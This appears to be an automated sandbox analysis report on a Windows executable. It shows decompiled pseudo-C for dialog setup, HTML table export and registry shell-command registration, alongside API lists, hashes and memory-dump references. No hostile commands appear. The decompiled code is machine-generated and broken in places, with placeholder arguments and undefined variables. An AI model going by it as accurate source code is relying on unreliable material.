                                                                                                        • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                        • API String ID: 3143752011-1996832678
                                                                                                        • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                        • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                        • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                        • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 97%
                                                                                                        			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                                                        0x00403c09
                                                                                                        0x00403c0c
                                                                                                        0x00403c11
                                                                                                        0x00403c1b
                                                                                                        0x00403c3f
                                                                                                        0x00403c4a
                                                                                                        0x00403c6e
                                                                                                        0x00403c96
                                                                                                        0x00403c9a
                                                                                                        0x00403ca6
                                                                                                        0x00403cb3
                                                                                                        0x00403cb8
                                                                                                        0x00403cc5
                                                                                                        0x00403cca
                                                                                                        0x00403cdd
                                                                                                        0x00403ce6
                                                                                                        0x00403cf8
                                                                                                        0x00403d11
                                                                                                        0x00403d26
                                                                                                        0x00403d3f
                                                                                                        0x00403d54
                                                                                                        0x00403d6d
                                                                                                        0x00403d76
                                                                                                        0x00403d88
                                                                                                        0x00403d9e
                                                                                                        0x00403db0
                                                                                                        0x00403db5
                                                                                                        0x00403dc4
                                                                                                        0x00403dc8
                                                                                                        0x00403dc9
                                                                                                        0x00403dca
                                                                                                        0x00403dda
                                                                                                        0x00403ddf
                                                                                                        0x00403de2
                                                                                                        0x00403de3
                                                                                                        0x00403df4
                                                                                                        0x00403df8
                                                                                                        0x00403df9
                                                                                                        0x00403dfa
                                                                                                        0x00403e0a
                                                                                                        0x00403e0f
                                                                                                        0x00403e12
                                                                                                        0x00403e13
                                                                                                        0x00403e22
                                                                                                        0x00403e26
                                                                                                        0x00403e28
                                                                                                        0x00403e29
                                                                                                        0x00403e39
                                                                                                        0x00403e3e
                                                                                                        0x00403e41
                                                                                                        0x00403e42
                                                                                                        0x00403e51
                                                                                                        0x00403e55
                                                                                                        0x00403e57
                                                                                                        0x00403e58
                                                                                                        0x00403e68
                                                                                                        0x00403e6d
                                                                                                        0x00403e70
                                                                                                        0x00403e71
                                                                                                        0x00403e71
                                                                                                        0x00403e87
                                                                                                        0x00403e8d
                                                                                                        0x00403e9e
                                                                                                        0x00403ea6
                                                                                                        0x00403eaf
                                                                                                        0x00403ebc

                                                                                                        APIs
                                                                                                          • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                          • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                          • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                          • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                        • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                        • GetDlgItem.USER32 ref: 00403C2F
                                                                                                        • SetWindowLongW.USER32 ref: 00403C39
                                                                                                          • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                          • Part of subcall function 00402DDD: GetWindow.USER32(?,00000005), ref: 00402E07
                                                                                                          • Part of subcall function 00402DDD: GetWindow.USER32(00000000), ref: 00402E0A
                                                                                                          • Part of subcall function 00402DDD: GetWindow.USER32(00000000,00000002), ref: 00402E16
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                        • LoadImageW.USER32 ref: 00403C6A
                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                        • LoadImageW.USER32 ref: 00403C7F
                                                                                                        • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                        • GetDlgItem.USER32 ref: 00403CB0
                                                                                                          • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 0040AD9D
                                                                                                          • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                        • GetDlgItem.USER32 ref: 00403CC2
                                                                                                        • GetDlgItem.USER32 ref: 00403CD4
                                                                                                          • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                          • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                          • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                          • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                          • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                          • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                          • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                          • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                        • GetDlgItem.USER32 ref: 00403D64
                                                                                                        • GetDlgItem.USER32 ref: 00403DC0
                                                                                                        • GetDlgItem.USER32 ref: 00403DF0
                                                                                                        • GetDlgItem.USER32 ref: 00403E20
                                                                                                        • GetDlgItem.USER32 ref: 00403E4F
                                                                                                        • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                        • GetDlgItem.USER32 ref: 00403E9B
                                                                                                        • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1038210931-0
                                                                                                        • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                        • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                        • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                        • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 56%
                                                                                                        			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}































                                                                                                        0x00407763
                                                                                                        0x0040776c
                                                                                                        0x00407784
                                                                                                        0x0040778b
                                                                                                        0x00407797
                                                                                                        0x00407799
                                                                                                        0x0040779b
                                                                                                        0x004077a7
                                                                                                        0x004077ae
                                                                                                        0x004077bd
                                                                                                        0x004077c4
                                                                                                        0x004077d3
                                                                                                        0x004077da
                                                                                                        0x004077e1
                                                                                                        0x004077e6
                                                                                                        0x004077f2
                                                                                                        0x004077f5
                                                                                                        0x00407804
                                                                                                        0x00407805
                                                                                                        0x00407810
                                                                                                        0x00407812
                                                                                                        0x00407813
                                                                                                        0x00407818
                                                                                                        0x00407818
                                                                                                        0x00407825
                                                                                                        0x0040782d
                                                                                                        0x00407830
                                                                                                        0x0040783a
                                                                                                        0x00407840
                                                                                                        0x00407846
                                                                                                        0x00407849
                                                                                                        0x00407850
                                                                                                        0x0040785e
                                                                                                        0x00407864
                                                                                                        0x00407867
                                                                                                        0x0040786b
                                                                                                        0x0040786f
                                                                                                        0x00407877
                                                                                                        0x0040787a
                                                                                                        0x00407885
                                                                                                        0x00407892
                                                                                                        0x004078a8
                                                                                                        0x004078b8
                                                                                                        0x004078c5
                                                                                                        0x004078ff
                                                                                                        0x004078c7
                                                                                                        0x004078ca
                                                                                                        0x004078dd
                                                                                                        0x004078de
                                                                                                        0x004078e3
                                                                                                        0x004078e8
                                                                                                        0x004078eb
                                                                                                        0x004078f0
                                                                                                        0x004078f0
                                                                                                        0x00407906
                                                                                                        0x00407909
                                                                                                        0x0040790f
                                                                                                        0x0040791d
                                                                                                        0x00407923
                                                                                                        0x0040792d
                                                                                                        0x00407932
                                                                                                        0x0040793b
                                                                                                        0x00407942
                                                                                                        0x00407943
                                                                                                        0x0040794c
                                                                                                        0x00407953
                                                                                                        0x00407954
                                                                                                        0x00407959
                                                                                                        0x0040795c
                                                                                                        0x00407961
                                                                                                        0x0040796c
                                                                                                        0x00407971
                                                                                                        0x0040797a
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00407838
                                                                                                        0x00407838
                                                                                                        0x0040783a
                                                                                                        0x00407980
                                                                                                        0x0040798a
                                                                                                        0x004079a1

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                        • API String ID: 1607361635-601624466
                                                                                                        • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                        • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                        • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                        • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 40%
                                                                                                        			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                                                        0x00407b65
                                                                                                        0x00407b7c
                                                                                                        0x00407b83
                                                                                                        0x00407b91
                                                                                                        0x00407b98
                                                                                                        0x00407ba6
                                                                                                        0x00407bad
                                                                                                        0x00407bb2
                                                                                                        0x00407bb9
                                                                                                        0x00407bca
                                                                                                        0x00407bcb
                                                                                                        0x00407bd6
                                                                                                        0x00407bdb
                                                                                                        0x00407bdc
                                                                                                        0x00407be1
                                                                                                        0x00407be1
                                                                                                        0x00407be8
                                                                                                        0x00407bf9
                                                                                                        0x00407bfa
                                                                                                        0x00407c05
                                                                                                        0x00407c0a
                                                                                                        0x00407c0b
                                                                                                        0x00407c1c
                                                                                                        0x00407c21
                                                                                                        0x00407c21
                                                                                                        0x00407c2a
                                                                                                        0x00407c2b
                                                                                                        0x00407c36
                                                                                                        0x00407c3b
                                                                                                        0x00407c3c
                                                                                                        0x00407c41
                                                                                                        0x00407c51
                                                                                                        0x00407c56
                                                                                                        0x00407c5b
                                                                                                        0x00407c65
                                                                                                        0x00407c68
                                                                                                        0x00407c6b
                                                                                                        0x00407c74
                                                                                                        0x00407c7b
                                                                                                        0x00407c80
                                                                                                        0x00407c82
                                                                                                        0x00407c88
                                                                                                        0x00407ca6
                                                                                                        0x00407c8a
                                                                                                        0x00407c8a
                                                                                                        0x00407c8b
                                                                                                        0x00407c96
                                                                                                        0x00407c9b
                                                                                                        0x00407c9c
                                                                                                        0x00407ca1
                                                                                                        0x00407ca1
                                                                                                        0x00407cb3
                                                                                                        0x00407cb4
                                                                                                        0x00407cbd
                                                                                                        0x00407cc4
                                                                                                        0x00407cc5
                                                                                                        0x00407cd0
                                                                                                        0x00407cd5
                                                                                                        0x00407cd6
                                                                                                        0x00407cdb
                                                                                                        0x00407ceb
                                                                                                        0x00407cf0
                                                                                                        0x00407cf3
                                                                                                        0x00407cf3
                                                                                                        0x00407cf3
                                                                                                        0x00000000
                                                                                                        0x00407cfc
                                                                                                        0x00407d00

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287785846.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287793450.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000007.00000002.287799805.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                        Similarity
                                                                                                        • API ID: _snwprintf$memset$wcscpy
                                                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                        • API String ID: 2000436516-3842416460
                                                                                                        • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                        • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                        • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                        • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 51%
                                                                                                        			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                                                        0x00404415
                                                                                                        0x0040441d
                                                                                                        0x0040442c
                                                                                                        0x00404435
                                                                                                        0x004045b3
                                                                                                        0x004045b7
                                                                                                        0x004045b7
                                                                                                        0x0040444b
                                                                                                        0x00404452
                                                                                                        0x00404457
                                                                                                        0x00404460
                                                                                                        0x00404461
                                                                                                        0x00404462
                                                                                                        0x0040446d
                                                                                                        0x00404472
                                                                                                        0x00404473
                                                                                                        0x00404490
                                                                                                        0x004044a5
                                                                                                        0x004044b4
                                                                                                        0x004044b6
                                                                                                        0x004044b7
                                                                                                        0x004044bd
                                                                                                        0x004044cf
                                                                                                        0x004044db
                                                                                                        0x004044eb
                                                                                                        0x004044f1
                                                                                                        0x004044f6
                                                                                                        0x004044f9
                                                                                                        0x004044fe
                                                                                                        0x00404506
                                                                                                        0x00404507
                                                                                                        0x00404508
                                                                                                        0x00404510
                                                                                                        0x00404521
                                                                                                        0x00404532
                                                                                                        0x00404539
                                                                                                        0x00404547
                                                                                                        0x0040454e
                                                                                                        0x0040455b
                                                                                                        0x0040455c
                                                                                                        0x00404564
                                                                                                        0x0040456f
                                                                                                        0x00404570
                                                                                                        0x00404571
                                                                                                        0x0040457c
                                                                                                        0x0040457d
                                                                                                        0x00404588
                                                                                                        0x00404589
                                                                                                        0x0040458a
                                                                                                        0x004045a0
                                                                                                        0x004045a5
                                                                                                        0x00404521
                                                                                                        0x004044eb
                                                                                                        0x004045ab
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 00404452
                                                                                                        • _snwprintf.MSVCRT ref: 00404473
                                                                                                          • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                          • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                          • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                        • memset.MSVCRT ref: 004044CF
                                                                                                          • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                        • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                        • memset.MSVCRT ref: 00404539
                                                                                                        • memset.MSVCRT ref: 0040454E
                                                                                                        • _snwprintf.MSVCRT ref: 00404571
                                                                                                        • _snwprintf.MSVCRT ref: 0040458A
                                                                                                          • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000007.00000002.287776443.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000007.00000002.287771517.0000000000400000.00000002.00020000.sdmp Download File
